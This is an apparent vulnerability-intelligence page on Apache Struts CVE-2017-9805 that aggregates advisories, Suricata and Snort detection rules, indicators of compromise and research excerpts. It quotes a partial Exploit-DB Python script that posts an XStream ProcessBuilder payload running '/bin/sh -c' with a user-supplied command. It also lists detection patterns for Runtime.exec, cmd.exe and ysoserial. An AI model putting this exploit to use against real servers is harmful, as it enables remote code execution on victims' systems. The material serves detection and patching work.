CVE-2017-9805
published 2017-09-15CVE-2017-9805: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for…
PriorityP196high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
99.46%
99.9th percentile
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | struts | >= 2.1.2 < 2.3.34 | 2.3.34 |
| apache | struts | >= 2.5.0 < 2.5.13 | 2.5.13 |
| apache_software_foundation | apache_struts | — | — |
| cisco | hosted_collaboration_solution | — | — |
| cisco | hosted_collaboration_solution | — | — |
| cisco | hosted_collaboration_solution | — | — |
| cisco | hosted_collaboration_solution | — | — |
| cisco | media_experience_engine | — | — |
| cisco | media_experience_engine | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
SID 44315
- →Exploitation targets HTTP POST requests to the path /struts2-rest-showcase/orders/3 with Content-Type: application/xml, delivering a crafted XStream XML deserialization payload. ↗
- →Nuclei template matcher looks for HTTP 500 response containing both 'Debugging information' and 'com.thoughtworks.xstream.converters.collections.MapConverter' in the body to confirm successful exploitation trigger. ↗
- →Scanning activity is identified by outbound wget requests that include the compromised website name in the URL query parameter, writing output to /dev/null (no file drop), used purely to beacon vulnerable hosts back to attacker infrastructure. ↗
- →Shodan and FOFA queries can be used to identify exposed Struts instances: search for 'apache struts' in HTML body, 'struts2 showcase' in title, or 'struts problem report' in body. ↗
- →A significant portion of exploitation traffic originates from the IP associated with wildkind.ru (188.120.246.215); traffic from this IP to Struts REST endpoints should be treated as high-confidence exploitation. ↗
- ·The Tenable remote check plugin (102977) requires 'perform thorough tests' enabled and a Web Application Scan configured; it will NOT work from Tenable.io shared scanner pools due to the blind RCE nature of the vulnerability — on-premise scanners must be used. ↗
- ·The Tenable authenticated local check plugin (102960) only runs when the scan Accuracy setting is set to 'Show potential false alarms' and cannot detect if a workaround is in place that mitigates the vulnerability. ↗
- ·Snort rule 44315 was released at time of disclosure; additional rules may be released and current rules are subject to change pending additional vulnerability information — customers should keep SRU/rule packs updated. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
cisa8.1HIGH
vendor_redhat8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Apache Struts Deserialization of Untrusted Data Vulnerability
cisa·2021-11-03·CVSS 8.1
CVE-2017-9805 [HIGH] CWE-502 Apache Struts Deserialization of Untrusted Data Vulnerability
Vulnerability: Apache Struts Deserialization of Untrusted Data Vulnerability
Affected: Apache Struts
Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2017-9805
Remediation Due Date: 2022-05-03
Cisco
Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
vendor_cisco·2017-09-07
CVE-2017-9793 [CRITICAL] CWE-20 Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
On September 5, 2017, the Apache Software Foundation released security bulletins that disclosed three vulnerabilities in the Apache Struts 2 package. Of these vulnerabilities, the Apache Software Foundation classifies one as Critical Severity, one as Medium Severity, and one as Low Severity. For more information about the vulnerabilities, refer to the Details section of this advisory.
Multiple Cisco products incorporate a version of the Apache Struts 2 package that is affected by these vulnerabilities.
The following Snort rule can be used to detect possible exploitation of this vulnerability: Snort SIDs 44315 and 44327 through 44330.
This advisory is available at the following link:
https://sec.clouda
Red Hat
struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
vendor_redhat·2017-09-05·CVSS 8.1
CVE-2017-9805 [HIGH] CWE-20 struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
struts: RCE attack via REST plugin with XStream handler to deserialise XML requests
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
The REST Plugin in Apache Struts2 is using a XStreamHandler with an instance of XStream for deserialization without any type filtering which could lead to Remote Code Execution when deserializing XML payloads. An attacker could use this flaw to execute arbitrary code or conduct further attacks.
Statement: A previous statement by Red Hat related to this CVE, prior to August 2019, said that Apache Struts 2 is not included in any Red Hat products. T
Cisco
Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
vendor_cisco
CVE-2017-9805 Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
CVE-2017-9805: Multiple Vulnerabilities in Apache Struts 2 Affecting Cisco Products: September 2017
On September 5, 2017, the Apache Software Foundation released security bulletins that disclosed three vulnerabilities in the Apache Struts 2 package. Of these vulnerabilities, the Apache Software Foundation classifies one as Critical Severity , one as Medium Severity , and one as Low Severity . For more information about the vulnerabilities, refer to the
CWE: CWE-20, CWE-399, CWE-20, CWE-399
Bug IDs: CSCvf86117, CSCvf86119, CSCvf86143, CSCvf86124, CSCvf86134
OSV
REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
osv·2018-10-16
CVE-2017-9805 [HIGH] REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
GHSA
REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
ghsa·2018-10-16
CVE-2017-9805 [HIGH] CWE-502 REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
REST Plugin in Apache Struts uses an XStreamHandler with an instance of XStream for deserialization without any type filtering
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.
VulnCheck
Apache Struts Deserialization of Untrusted Data Vulnerability
vulncheck·2017·CVSS 8.1
CVE-2017-9805 [HIGH] CWE-502 Apache Struts Deserialization of Untrusted Data Vulnerability
Apache Struts Deserialization of Untrusted Data Vulnerability
Apache Struts REST Plugin uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to remote code execution when deserializing XML payloads.
Affected: Apache Struts
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.ivanti.com/resources/v/doc/pr-survey-report/ransomware-quarterly-indexreport_q2-q3; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-05&host_type=src&vulnerability=cve-2017-9805; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=20
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin Vulnerability (CVE-2017-9805)
suricata·2019-06-26·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin Vulnerability (CVE-2017-9805)
ET EXPLOIT Apache Struts 2 REST Plugin Vulnerability (CVE-2017-9805)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin Vulnerability (CVE-2017-9805)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/struts2"; http.content_type; content:"|25 7b 28 23|"; isdataat:500,relative; content:"cmd.exe"; fast_pattern; content:"@java.lang.System@getProperty(|27|os.name|27|)"; reference:cve,2017-9805; reference:url,forums.juniper.net/t5/Threat-Research/Anatomy-of-the-Bulehero-Cryptomining-Botnet/ba-p/458787; classtype:attempted-user; sid:2027516; rev:3; metadata:affected_product Apache_Struts2, attack_target Client_Endpoint, created_at 2019_06_26, cve CVE_2017_9805, deployment Perimeter, performance_impact Moderate, signature_severity Ma
Suricata
ET SCAN struts-pwn User-Agent
suricata·2017-10-16·CVSS 8.1
CVE-2017-9805 [HIGH] ET SCAN struts-pwn User-Agent
ET SCAN struts-pwn User-Agent
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN struts-pwn User-Agent"; flow:established,to_server; http.user_agent; content:"struts-pwn"; startswith; fast_pattern; reference:url,github.com/mazen160/struts-pwn_CVE-2017-9805/blob/master/struts-pwn.py; reference:cve,2017-9805; reference:url,paladion.net/paladion-cyber-labs-discovers-a-new-ransomware/; classtype:attempted-user; sid:2024843; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_10_16, cve CVE_2017_9805, deployment Datacenter, performance_impact Moderate, confidence High, signature_severity Minor, tag CISA_KEV, updated_at 2024_04_12;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)
ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin (ProcessBuilder)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/struts2-rest-showcase/orders/3"; http.request_body; content:"java.lang.ProcessBuilder"; nocase; fast_pattern; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024675; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 1"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"eXNvc2VyaWFsL"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024668; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag possible_exploitation, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 2"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"lzb3NlcmlhbC"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024669; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag possible_exploitation, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin (B64) 5"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/struts2-rest-showcase/orders/3"; http.request_body; content:"|72 2b 75 72|"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024672; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3
ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin ysoserial Usage (B64) 3"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"5c29zZXJpYWwv"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024670; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag possible_exploitation, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin (B64) 4"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/struts2-rest-showcase/orders/3"; http.request_body; content:"|79 76 36 36 76|"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024671; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6
ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin (B64) 6"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/struts2-rest-showcase/orders/3"; http.request_body; content:"|4b 2f 72 71 2b|"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024673; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec)
suricata·2017-09-07·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec)
ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin (Runtime.Exec)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/struts2-rest-showcase/orders/3"; http.request_body; content:"java.lang.Runtime"; nocase; fast_pattern; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024674; rev:4; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_07, cve CVE_2017_9805, deployment Datacenter, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec)
suricata·2017-09-06·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec)
ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (Runtime.Exec)"; flow:established,to_server; http.request_body; content:"java.lang.Runtime"; nocase; fast_pattern; content:".exec"; distance:0; content:"]/Rs"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024664; rev:3; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_06, cve CVE_2017_9805, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Suricata
ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)
suricata·2017-09-06·CVSS 8.1
CVE-2017-9805 [HIGH] ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)
ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)
Rule: alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Apache Struts 2 REST Plugin XStream RCE (ProcessBuilder)"; flow:established,to_server; http.request_body; content:"java.lang.ProcessBuilder"; nocase; fast_pattern; content:"]/Rs"; reference:cve,2017-9805; reference:url,lgtm.com/blog/apache_struts_CVE-2017-9805_announcement; classtype:attempted-user; sid:2024663; rev:3; metadata:affected_product Apache_Struts2, attack_target Web_Server, created_at 2017_09_06, cve CVE_2017_9805, deployment Perimeter, performance_impact Low, confidence Medium, signature_severity Critical, tag CISA_KEV, updated_at 2024_03_07;)
Exploit-DB
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
exploitdb·2017-09-06·CVSS 8.1
CVE-2017-9805 [HIGH] Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
Apache Struts 2.5
0
false
0
/bin/sh-c'''+ command +'''
false
java.lang.ProcessBuilder
start
foo
foo
false
0
0
false
false
0
'''
url = sys.argv[1]
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
'Content-Type': 'application/xml'}
request = requests.post(url, data=exploit, headers=headers)
print (request.text)
if len(sys.argv) < 3:
print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
print ('[*] Warflop - http://securityattack.com.br')
print ('[*] Greatz: Pimps & G4mbl3r')
print ('[*] Use: python struts2.py URL COMMAND')
print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
exit(0)
else:
exploration(sys.argv[2])
Metasploit
Apache Struts 2 REST Plugin XStream RCE
metasploit
Apache Struts 2 REST Plugin XStream RCE
Apache Struts 2 REST Plugin XStream RCE
Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12, using the REST plugin, are vulnerable to a Java deserialization attack in the XStream library.
Nuclei
Apache Struts2 S2-052 - Remote Code Execution
nuclei·CVSS 8.1
CVE-2017-9805 [HIGH] Apache Struts2 S2-052 - Remote Code Execution
Apache Struts2 S2-052 - Remote Code Execution
The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
Template:
id: CVE-2017-9805
info:
name: Apache Struts2 S2-052 - Remote Code Execution
author: pikpikcu
severity: high
description: The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.
impact: |
Remote code execution
remediation: |
Apply the latest security patches or upg
Nuclei
Apache Struts2 S2-053 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-9791 [CRITICAL] Apache Struts2 S2-053 - Remote Code Execution
Apache Struts2 S2-053 - Remote Code Execution
Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
Template:
id: CVE-2017-9791
info:
name: Apache Struts2 S2-053 - Remote Code Execution
author: pikpikcu
severity: critical
description: |
Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.
impact: |
Remote code execution
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
reference:
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html
- http://struts.apache.org/docs/s2-048.html
- http
Nuclei
Apache Struts2 S2-053 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-12611 [CRITICAL] Apache Struts2 S2-053 - Remote Code Execution
Apache Struts2 S2-053 - Remote Code Execution
Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.
Template:
id: CVE-2017-12611
info:
name: Apache Struts2 S2-053 - Remote Code Execution
author: pikpikcu
severity: critical
description: Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.
impact: |
Remote code execution
remediation: |
Apply the latest security patches or upgrade to a non-vulnerable version of Apache Struts2.
reference:
- https://struts.apache.org/docs/s2-053.html
- https://nvd.n
arXiv
Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference
arxiv_fulltext·2024-12-15
Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference
Do Chase Your Tail! Missing Key Aspects Augmentation in Textual Vulnerability Descriptions of Long-tail Software through Feature Inference
Linyi Han, Shidong Pan, Zhenchang Xing, Jiamou Sun, Sofonias Yitagesu, Xiaowang Zhang, Zhiyong Feng
Manuscript received XXX XXX, 20XX. (Corresponding author: Xiaowang Zhang)
Linyi Han, Sofonias Yitagesu, Xiaowang Zhang, and Zhiyong Feng are with the College of Intelligence and Computing, Tianjin University, Tianjin, China. e-mail: \hanly2, xiaowangzhang, zyfeng\@tju.edu.cn and [email protected].
Shidong Pan, Zhenchang Xing, and Jiamou Sun are with the CSIRO's Data61, Canberra, Australia. e-mail: \Shidong.Pan, Zhenchang.Xing, Frank.Sun\@data61.csiro.au
Linyi Han is also the Center of National Railway Intelligent Transportation System Engineeri
arXiv
An In-depth Study of Java Deserialization Remote-Code Execution Exploits and Vulnerabilities
arxiv_fulltext·2022-08-17
An In-depth Study of Java Deserialization Remote-Code Execution Exploits and Vulnerabilities
An In-depth Study of Java Deserialization Remote-Code Execution Exploits and Vulnerabilities
[Imen Sayar]Imen Sayar^
[email protected]
University of Toulouse
Blagnac
France
31070
^ Part of this research was conducted when Imen Sayar was at the University of Luxembourg
[Alexandre Bartel]Alexandre Bartel^*
[email protected]
Umeå University
MIT-Huset
Umeå
Sweden
^*Part of this research was conducted when Alexandre Bartel was at the University of Luxembourg and the University of Copenhagen.
Eric Bodden
[email protected]
Paderborn University
Paderborn
Germany
Yves Le Traon
[email protected]
University of Luxembourg
6, rue Richard Coudenhove-Kalergi
Kirchberg Campus
Luxembourg
L-1359
## Abstract
Nowadays, an increasing number of applications uses deserializatio
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
arXiv
Tiresias: Predicting Security Events Through Deep Learning
arxiv_fulltext·2019-05-24
Tiresias: Predicting Security Events Through Deep Learning
et al.
e.g.,
i.e.,
10.1145/3243734.3243811
2018
2018
acmlicensed
[CCS '18]2018 ACM SIGSAC Conference on Computer and Communications SecurityOctober 15--19, 2018Toronto, ON, Canada
2018 ACM SIGSAC Conference on Computer and Communications Security (CCS '18), October 15--19, 2018, Toronto, ON, Canada
15.00
: Predicting Security Events Through Deep Learning
Yun Shen^ , Enrico Mariconti^ , Pierre-Antoine Vervier^ , and Gianluca Stringhini^
^ Symantec Research Labs, ^ University College London, ^ Boston University
\yun_shen,pierre-antoine_vervier\@symantec.com, [email protected], [email protected]
## Abstract
With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps tha
CTF
README
ctf_writeups·CVSS 9.8
[CRITICAL] README
# Boot to root CTFs
Walkthroughs and notes of 'boot to root' CTFs mostly from VulnHub that I did for fun. I like to use vulnerable VMs from VulnHub (in addition to the ones I create) to organize hands-on penetration testing training sessions for junior security auditors/consultants :-)
### >> Classic pentest methodology to do a Boot2root CTF upload a Webshell)
➤ Clear-text passwords stored in 'public' website pages, configuration files, log files
➤ ...
2. Exploiting unpatched known vulnerabilities
➤ Web server (e.g. Apache Struts RCE: CVE-2017-12611/CVE-2017-9805/CVE-2017-9791, JBoss Java Deserialization RCE)
➤ Bash & web server CGI (e.g. Shellshock RCE CVE-2014-6271/CVE-2014-7169)
➤ Web CMS (e.g. Drupalgeddon2 RCE CVE-2018-7600)
➤ Web framework (e.g. PHP CGI RCE CVE-2012-1823)
➤ FTP s
Trendmicro
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
blogs_trendmicro·2025-05-27
Earth Lamia Develops Custom Arsenal to Target Multiple Industries
APT & Targeted Attacks
# Earth Lamia Develops Custom Arsenal to Target Multiple Industries
Trend™ Research has been tracking an active APT threat actor named Earth Lamia, targeting multiple industries in Brazil, India and Southeast Asia countries at least since 2023. The threat actor primarily exploits vulnerabilities in web applications to gain access to targeted organizations.
By: Joseph C Chen
2025/05/27
Read time: ( words)
Save to Folio
Summary
- Trend Research has identified Earth Lamia as an APT threat actor that exploits vulnerabilities in web applications to gain access to organizations, using various techniques for data exfiltration.
- Earth Lamia develops and customizes hacking tools to evade detection, such as PULSEPACK and BypassBoss.
- Earth Lamia has primarily targeted
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Talos
2018 in Snort Rules
blogs_talos·2019-02-06
2018 in Snort Rules
This blog post was authored by Benny Ketelslegers of Cisco Talos
The cybersecurity field shifted quite a bit in 2018. With the boom of cryptocurrency, we saw a transition from ransomware to cryptocurrency miners. Talos researchers identified APT campaigns including VPNFilter, predominantly affecting small business and home office networking equipment, as well as Olympic Destroyer, apparently designed to disrupt the Winter Olympics.
But these headline-generating attacks were only a small part of the day-to-day protection provided by security systems. In this post, we'll review some of the findings created by investigating the most frequently triggered SNORTⓇ rules as reported by Cisco Meraki systems. These rules protected our customers from some of the most common attacks that, even though
Talos
Another Apache Struts Vulnerability Under Active Exploitation
blogs_talos·2017-09-07·CVSS 9.8
CVE-2017-9805 [CRITICAL] Another Apache Struts Vulnerability Under Active Exploitation
This post authored by Nick Biasini with contributions from Alex Chiu.
Earlier this week, a critical vulnerability in Apache Struts was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.
This isn't the only vulnerability that has been recently identified in Apache Struts. Earlier this year, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to
Talos
Another Apache Struts Vulnerability Under Active Exploitation
blogs_talos·2017-09-07·CVSS 9.8
CVE-2017-9805 [CRITICAL] Another Apache Struts Vulnerability Under Active Exploitation
## Another Apache Struts Vulnerability Under Active Exploitation
This post authored by Nick Biasini with contributions from Alex Chiu .
Earlier this week, a critical vulnerability in Apache Struts was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.
